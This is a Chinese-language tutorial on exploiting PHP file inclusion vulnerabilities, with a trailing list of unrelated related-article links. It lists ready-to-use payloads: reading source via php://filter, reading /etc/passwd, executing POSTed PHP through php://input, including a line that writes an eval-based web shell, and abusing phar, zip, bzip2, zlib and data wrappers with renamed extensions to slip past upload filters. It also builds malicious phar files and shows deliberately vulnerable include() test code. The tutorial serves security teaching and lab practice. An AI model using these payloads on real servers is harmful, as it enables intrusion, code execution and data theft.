作者:Qftm 合天智汇

前言

这个手册主要是记录针对PHP文件包含漏洞的利用思路与Bypass手法的总结。

相关函数

四个函数

php中引发文件包含漏洞的通常主要是以下四个函数:

1、include()

http://www.php.net/manual/en/function.include.php

2、include_once()

http://php.net/manual/en/function.include-once.php

3、require()

http://php.net/manual/en/function.require.php

4、require_once()

http://php.net/manual/en/function.require-once.php

函数功能

当利用这四个函数来包含文件时,不管文件是什么类型(图片、txt等等),都会直接作为php文件进行解析。

函数差异

include()

include() 函数包含出错的话,只会提出警告,不会影响后续语句的执行

require()

require() 函数包含出错的话,则会直接退出,后续语句不在执行

include_once() 和 require_once()

require_once() 和 include_once() 功能与require() 和 include() 类似。但如果一个文件已经被包含过了,则 require_once() 和 include_once() 则不会再包含它,以避免函数重定义或变量重赋值等问题。

二次包含

一次包含

漏洞原因

文件包含函数所加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致执行了非预期的代码。

漏洞分类

LFI

LFI本地文件包含漏洞主要是包含本地服务器上存储的一些文件,例如session文件、日志文件、临时文件等。同时借助此漏洞也可以查看服务器上的一些重要文件。但是,只有我们能够控制包含的文件存储我们的恶意代码才能拿到服务器权限。

例如本地读取/etc/passwd系统重要文件

RFI

RFI(Remote File Inclusion) 远程文件包含漏洞。是指能够包含远程服务器上的文件并执行。由于远程服务器的文件是我们可控的,因此漏洞一旦存在危害性会很大。 但RFI的利用条件较为苛刻,需要php.ini中进行配置

allow_url_fopen = On allow_url_include = Onallow_url_fopen = On

该选项为on便是激活了 URL 形式的 fopen 封装协议使得可以访问 URL 对象文件等。

allow_url_include:On

该选项为on便是允许 包含URL 对象文件等。

两个配置选项均需要为On,才能远程包含文件成功

修改php.ini

在php.ini中,allow_url_fopen默认一直是On,而allow_url_include从php5.2之后就默认为Off。

php5.5.9 -> php.ini

包含姿势

php伪协议

PHP 带有很多内置 URL 风格的封装协议,可用于类似 fopen()、 copy()、 file_exists() 和 filesize() 的文件系统函数。 除了这些封装协议,还能通过 stream_wrapper_register() 来注册自定义的封装协议。

file:// — 访问本地文件系统 http:// — 访问 HTTP(s) 网址 ftp:// — 访问 FTP(s) URLsphp:// — 访问各个输入/输出流(I/O streams)zlib:// — 压缩流 data:// — 数据(RFC 2397) glob:// — 查找匹配的文件路径模式 phar:// — PHP 归档 ssh2:// — Secure Shell 2rar:// — RAR ogg:// — 音频流expect:// — 处理交互式的流

可以在phpinfo中的Registered PHP Streams中找到可使用的协议。

下面测试代码均为:

<?php      $file = $_GET['file'];     include($file); ?>

若有特殊案例,会声明。

php.ini

allow_url_fopen 默认为 On allow_url_include 默认为 Off

若有特殊要求,会在利用条件里指出。

php://filter

php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。

参数

过滤器列表

  • 字符串过滤器
  • string.strip_tags
  • 转换过滤器
  • 压缩过滤器
  • 加密过滤器
可用过滤器列表:https://www.php.net/manual/zh/filters.php

利用条件:无

利用姿势1

index.php?file=php://filter/read=convert.base64-encode/resource=index.php

通过指定末尾的文件,可以读取经base64加密后的文件源码,之后再base64解码一下就行。虽然不能直接获取到shell等,但能读取敏感文件危害也是挺大的。同时也能够对网站源码进行审计。

利用姿势2

<?php      $file = $_GET['file'];     include($file); ?>

效果跟前面一样,只是少了个read关键字,在绕过一些waf时也许有用。file://
专们用于访问本地文件系统和php://filter类似都可以对本地文件进行读取用法:

/path/to/file.ext relative/path/to/file.ext fileInCwd.ext C:/path/to/winfile.ext C:pathowinfile.ext smbserversharepathowinfile.ext file:///path/to/file.ext ?file=file://[文件的绝对路径+文件名]

利用条件:无

利用姿势

index.php?file=file:///etc/passwd

php://input

php://input是个可以访问请求的原始数据的只读流,将post请求中的数据作为PHP代码执行。

利用条件

allow_url_include = On allow_url_fopen = On/Off

利用姿势

index.php?file=php://input POST: <?php phpinfo();?>/ phpinfo();?>

也可以使用burpsuite或curl进行利用

curl -v "http://127.0.0.1/FI/index.php?file=php://input" -d "<?php phpinfo();?>"

Getshell

POST:<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[Qftm])?>');?>

file_get_contents()的利用

file_get_contents()函数将整个文件读入一个字符串中

测试代码

<?php $file = $_GET['file']; if(file_get_contents($file,'r') == "Qftm"){      echo "you are Admin!!!"; } ?>

利用条件:无

利用姿势:

file_get.php?file=php://input POST:Qftm

php://input可以访问请求的原始数据的只读流。即可以直接读取到POST上没有经过解析的原始数据。 enctype=”multipart/form-data” 的时候 php://input 是无效的。

phar://

phar:// 支持zip、phar格式的文件包含。

  • zip

用法

?file=phar://[压缩包文件相对路径]/[压缩文件内的子文件名] ?file=phar://[压缩包文件绝对路径]/[压缩文件内的子文件名]

利用条件:php >= 5.3.0

利用姿势1

配合文件上传漏洞,当仅可以上传zip格式时

index.php?file=phar://index.zip/index.txt index.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/index.zip/index.txt

新建index.txt,使用zip格式压缩 -> index.zip

利用姿势2

配合文件上传漏洞,当仅可以上传图片格式时

针对phar://不管后缀是什么,都会当做压缩包来解压。

index.php?file=phar://head.png/head.txt index.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.png/head.txt

将做好的zip后缀改为png格式

  • phar

phar文件本质上是也一种压缩文件。

用法

?file=phar://[压缩包文件相对路径]/[压缩文件内的子文件名] ?file=phar://[压缩包文件绝对路径]/[压缩文件内的子文件名]

制作phar文件

制作包含恶意代码文件的phar文件

(1)确保本地php.ini中phar.readonly=Off

(2)编写恶意phar文件的php脚本

?php     @unlink("phar.phar");    $phar = new Phar("phar.phar");    $phar->startBuffering();     $phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub     $phar->addFromString("head.txt", "<?php phpinfo();?>"); //添加要压缩的文件及内容    //签名自动计算    $phar->stopBuffering(); ?>

(3)生成phar文件

<?php $p = new PharData(dirname(FILE).'/phartest.aaa', 0,'phartest',Phar::ZIP) ;$p->addFromString('testfile.txt', '<?php phpinfo();?>');?>

利用条件:php >= 5.3.0

利用姿势1

index.php?file=phar://phar.phar/head.txt index.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/phar.phar/head.txt

利用姿势2

index.php?file=phar://phar.png/head.txt index.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/phar.png/head.txt

利用协议特性,更改后缀文件可适当绕过一些限制

zip://

`zip协议`和`phar协议`类似,都支持`相对路径`和`绝对路径`(几乎网上所有人都说`zip协议`不支持`相对路径`,事实上是可以!!!) 在`php version 5.2.9`时已经修复`zip://`相对路径问题

使用zip协议,需将`#`编码为`%23`(浏览器时)

用法

?file=zip://[压缩包文件相对路径]#[压缩文件内的子文件名]?file=zip://[压缩包文件绝对路径]#[压缩文件内的子文件名]

利用条件:php >= 5.2(绝对路径) | php >= 5.29(相对/绝对路径) 利用姿势1

index.php?file=zip://head.zip%23head.txt index.php?file=zip://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.zip%23head.txt

利用姿势2

针对`zip://`不管后缀是什么,都会当做压缩包来解压,可以适当的绕过一些限制。

index.php?file=zip://head.png%23head.txt index.php?file=zip://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.png%23head.txt

相对路径 `php5.3.29 windows`

`php5.5.9 windows`

`5.4.16 Linux Centos7`

绝对路径

`windwos`

`Linux Centos7`

bzip2://

用法

?file=compress.bzip2://[压缩包文件相对路径]?file=compress.bzip2://[压缩包文件绝对路径]

利用条件:php >= 5.2

利用姿势1

index.php?file=compress.bzip2://head.bz2 index.php?file=compress.bzip2://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.bz2

相对路径

绝对路径

利用姿势2

利用协议特性,更改后缀文件可适当绕过一些限制

index.php?file=compress.bzip2://head.jpg index.php?file=compress.bzip2://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.jpg

zlib://

用法

?file=compress.zlib://[压缩包文件相对路径]?file=compress.zlib://[压缩包文件绝对路径]

利用条件:php >= 5.2

利用姿势1

index.php?file=compress.zlib://head.gz index.php?file=compress.zlib://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.gz

相对路径

绝对路径

利用姿势2: 利用协议特性,更改后缀文件可适当绕过一些限制

index.php?file=compress.zlib://head.jpg index.php?file=compress.zlib://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.jpg

data://

数据流封装器,和php://相似都是利用了流的概念

用法

data:,data:text/plain,data:text/html, data:text/html;base64,data:text/css, data:text/css;base64, data:text/javascript,data:text/javascript;base64,data:image/gif;base64,base64编码的gif图片数据data:image/png;base64,base64编码的png图片数据data:image/jpeg;base64,base64编码的jpeg图片数据data:image/x-icon;base64,base64编码的icon图片数据

利用条件

php >= 5.2 allow_url_fopen = Onallow_url_include = On

利用姿势1

index.php?file=data:text/plain,<?php phpinfo();?> index.php?file=data://text/plain,<?php phpinfo();?> ```

......未完待续

实验推荐:文件包含漏洞-中级篇

http://hetianlab.com/expc.do?ce=364ed95b-3c22-4556-b658-85d4768a0a48

(介绍文件包含时绕过限制的原理,以及介绍利用文件包含漏洞读取源码的原理。)

声明:笔者初衷用于分享与普及网络知识,若读者因此作出任何危害网络安全行为后果自负,与合天智汇及原作者无关!

fopen打开ftp文件_PHP文件包含漏洞利用思路与Bypass总结手册(一)相关推荐

  1. PHP文件包含漏洞利用思路与Bypass总结手册(一)

    本文作者:Qftm 目录 前言 相关函数 四个函数 函数功能 函数差异 漏洞原因 漏洞分类 包含姿势 php伪协议 php://filter file:// php://input file_get_ ...

  2. centos 阿帕奇无法解析php_PHP文件包含漏洞利用思路与Bypass总结手册(二)

    作者:Qftm 合天智汇 接上一篇:https://www.toutiao.com/i6819918030252802571/ 包含Session 在了解session包含文件漏洞及绕过姿势的时候,我 ...

  3. php本地文件包含漏洞,php文件包含漏洞利用小结

    漏洞概述: 文件包含漏洞是指客户端(一般为浏览器)用户通过输入控制动态包含在服务器的文件,从而导致恶意代码的执行及敏感信息的泄露,主要包括本地文件包含LFI和远程文件包含RFI两种形式. 产生原因: ...

  4. php文件包含漏洞利用

    上周我们部门弄了一个web安全的兴趣小组.说实话实在惭愧我虽然在安全公司每天都面对着各种漏洞,但是对渗透技术知之又少.于是加入兴趣小组后痛下决心好好学习渗透知识. 现在记录一下上周兴趣小组出的一个测试 ...

  5. 【代码审计】PHP文件包含漏洞利用总结

    0x01 概述 PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而导致意外的文件泄露甚至恶意的代码注入.涉及文件包含漏洞的四个函数如下: includ ...

  6. php filter 文件包含,php://filter(文件包含漏洞利用)及php://input

    1. php://filter 文件包含漏洞:https://blog.csdn.net/fageweiketang/article/details/80699051 筛选过滤应用: 1. 字符串过滤 ...

  7. PHP文件包含漏洞(利用phpinfo)复现

    漏洞简介: PHP文件包含漏洞中,如果找不到可以包含的文件,我们可以通过包含临时文件的方法来拿到权限.因为临时文件名是随机的,如果目标网站上存在phpinfo,则可以通过phpinfo来获取临时文件名 ...

  8. php文件什么打开,php文件是什么文件_php文件怎么打开 - 学无忧

    php文件,相信对于电脑初学者和没有网络基础的人都是一个没有听过的词语,如果听过或者见过PHP文件的网友都可能对这个php文件不是很了解.这个php文件是个什么文件呢?php文件怎么打开?所有今天学无 ...

  9. php安装文件怎么打开文件_php文件如何打开

    php文件如何打开 很多用户都不知道php是什么文件?也不知该如何打开php文件?下面小编带着大家一起来了解一下吧! PHP,是英文超级文本预处理语言Hypertext Preprocessor的缩写 ...

最新文章

  1. Unity3D笔记 GUI 一
  2. 【CENTOS6】ORACLE JDK7安装
  3. 工程项目如何实现采购效益最大化?
  4. codevs 1028 花店橱窗布置 (KM)
  5. CATIA 界面介绍
  6. 三星Galaxy A10s海报曝光:6.2寸水滴屏+4000mAh电池
  7. eclipse读取mysql数据乱码_eclipse从数据库获取数据时控制台乱码问题
  8. 电信中兴f452光猫路由改桥接最简单的方式,亲自体验成功。
  9. 永恒之蓝(ms17010)漏洞利用
  10. 可查看抖音各项数据的软件有哪些?99%的人可能不知道这3款
  11. python学习笔记_week19
  12. erp采购总监个人总结_ERP沙盘实训采购总监总结,学到了很多知识,受益匪浅
  13. 原生JS记忆翻牌小游戏
  14. python解决字符串倒序输出
  15. 详谈QTableWidget / QTableView
  16. 2019年5月25日
  17. Windows 运行chkdsk磁盘修复工具命令参数详解
  18. mysql高级查询练习题_MySQL高级查询习题
  19. Zxing3.4.0 --最新版本集成 --demo 安卓--
  20. 笔记:处理token过期

热门文章

  1. Silverlight 游戏开发小技巧:技能冷却效果1(Cooldown)
  2. Windows Server 2008 安装详细流程 解说
  3. C++ 字节流与二进制字符串相互转换(一个简单的明文加解密程序)
  4. linux 设置ssh免密登录
  5. Angular专题系列之一:初识Anjularjs
  6. 武电实业卡密接口对接经验分享
  7. oracle client安装与配置
  8. LaunchImage命名与AppIcon命名(ios设置 启动图片和AppIcon图片)
  9. js中的继承1--类继承
  10. 工厂模式和策略模式区别